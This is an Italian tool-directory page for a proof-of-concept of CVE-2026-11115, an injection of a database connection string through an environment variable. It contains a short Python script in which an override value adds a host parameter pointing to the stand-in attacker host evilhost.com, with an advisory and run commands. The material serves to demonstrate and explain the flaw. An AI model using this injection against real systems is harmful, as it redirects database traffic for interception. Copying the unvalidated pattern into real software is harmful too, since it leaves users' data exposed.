Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-11115-Database-Connection-String-Injection-via-Env-Variable — Proof-of-concept Python minimale per CVE-2026-11115, che dimostra l'iniezione della stringa di connessione al database tramite variabili d'ambiente e il reindirizzamento verso host PostgreSQL controllati dall'attaccante. | Kitploit
Strumenti/GitHubGitHub/george0papasotiriou/cve-2026-11115-database-connection-string-injection-via-env-variable
Analisi delle VulnerabilitàExploitPenetration TestingConfigurazione ErrataApprendimento e FormazioneSicurezza dei Database
GitHubgeorge0papasotiriou/cve-2026-11115-database-connection-string-injection-via-env-variable

CVE-2026-11115-Database-Connection-String-Injection-via-Env-Variable

Proof-of-concept Python minimale per CVE-2026-11115, che dimostra l'iniezione della stringa di connessione al database tramite variabili d'ambiente e il reindirizzamento verso host PostgreSQL controllati dall'attaccante.

Vedi Repository
61 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-11115 – Iniezione della Stringa di Connessione al Database tramite Variabile d'Ambiente

Codice del Programma (Python)

root@kitploit:~
# db_connector.py - Constructs DB connection string from environment
import os, psycopg2

def connect():
    # Reads DB_URL; attacker can override via environment injection if they control an env var
    db_url = os.getenv('DB_URL', 'postgresql://user:pass@localhost/db')
    # Vulnerability: no validation; allows extra parameters like ?application_name=... but also SSRF or auth bypass
    conn = psycopg2.connect(db_url)
    return conn

# Simulate an attacker who can set environment variable:
os.environ['DB_URL'] = "postgresql://user:pass@localhost/db?host=evilhost.com&sslmode=disable"
c = connect()  # Connects to attacker-controlled host!
print("Connected to attacker DB.")

CVE-2026-11115 – Iniezione della Stringa di Connessione al Database

Severity: High

Panoramica

Un'applicazione costruisce la propria stringa di connessione al database a partire da una variabile d'ambiente senza validazione. Se un attaccante può influenzare quella variabile (ad es., tramite server‑side request forgery o una configurazione errata della pipeline CI/CD), può reindirizzare la connessione al database verso il proprio server, intercettando o modificando i dati.

Dettagli della Vulnerabilità

  • Tipo: Iniezione della Stringa di Connessione
  • Impatto: Esfiltrazione dei dati, man‑in‑the‑middle.
  • Causa principale: L'URI completo di connessione viene preso da una variabile d'ambiente e parametri aggiuntivi (come host) possono essere aggiunti per sovrascrivere l'host originale.

Dimostrazione dell'Exploit

Esegui la simulazione:

root@kitploit:~
pip install psycopg2-binary
python db_connector.py

Il programma tenta di connettersi a evilhost.com invece che a localhost.

Scarica lo strumento